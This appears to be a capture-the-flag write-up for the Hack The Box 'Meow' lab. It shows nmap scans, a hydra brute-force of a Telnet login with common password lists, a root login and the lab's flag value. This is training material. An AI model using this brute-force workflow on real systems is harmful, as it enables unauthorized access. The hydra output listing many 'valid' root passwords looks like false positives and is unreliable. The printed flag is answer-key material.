01.MEOW (TELNET)

OVERVIEW

Target Service:	                  Telnet
Attack:                           Brute Force
Vulnerability:                    Authentication Vulnerability – Weak Credentials
MITRE Tactics & Technques:	  TA0001: Initial Access
                                   - T1078: Valid Accounts
                                  T1110.001: Brute Force – Password Guessing
                                   - TA0006: Credential Access

Summary: The target system exposed a Telnet service with no authentication hardening, 
         allowing access via default or easily guessable credentials. A brute-force 
         attempt using common username-password combinations succeeded, revealing a 
         serious authentication misconfiguration.
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 10.129.201.145 -p-
 PORT     STATE SERVICE       VERSION
 23/tcp   open  telnet        Linux telnetd

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 10.129.201.145 -p 23
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln 10.129.201.145 -p 23
 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 23
    - e.g., weak Telnet configurations, or known vulnerabilities in the Telnet 
      service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
#BRUTE FORCE USERNAME & PASSWORD
root@htb:~$ locate username
 /usr/share/seclists/Usernames/top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ locate password
 /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Passwords/Common-Credentials/top-passwords-shortlist.txt .

root@htb:~$ hydra -L top-usernames-shortlist.txt -P top-passwords-shortlist.txt 10.129.201.145 telnet
 [23][telnet] host: 10.129.201.145   login: root   password: dragon
 [23][telnet] host: 10.129.201.145   login: root   password: querty
 [23][telnet] host: 10.129.201.145   login: root   password: master
 [23][telnet] host: 10.129.201.145   login: root   password: 1234567
 [23][telnet] host: 10.129.201.145   login: root   password: trustno1
 [23][telnet] host: 10.129.201.145   login: root   password: letmein
 [23][telnet] host: 10.129.201.145   login: root   password: 111111
 [23][telnet] host: 10.129.201.145   login: root   password: abc123
 [23][telnet] host: 10.129.201.145   login: root   password: iloveyou
 [23][telnet] host: 10.129.201.145   login: root   password: monkey
 [23][telnet] host: 10.129.201.145   login: root   password: 123456
 [23][telnet] host: 10.129.201.145   login: root   password: 12345678
 [23][telnet] host: 10.129.201.145   login: root   password: password
 [23][telnet] host: 10.129.201.145   login: root   password: sunshine
 [23][telnet] host: 10.129.201.145   login: root   password: baseball
 [23][telnet] host: 10.129.201.145   login: root   password: 123123

root@htb:~$ telnet {targetIP/domain}
 Meow login: root

root@Meow:~# ls
 flag.txt  snap

root@Meow:~# cat flag.txt
 b40abdfe23665f766f9c61ecba8a4c19
PreviousTIER 0Next02.FAWN (FTP)

Last updated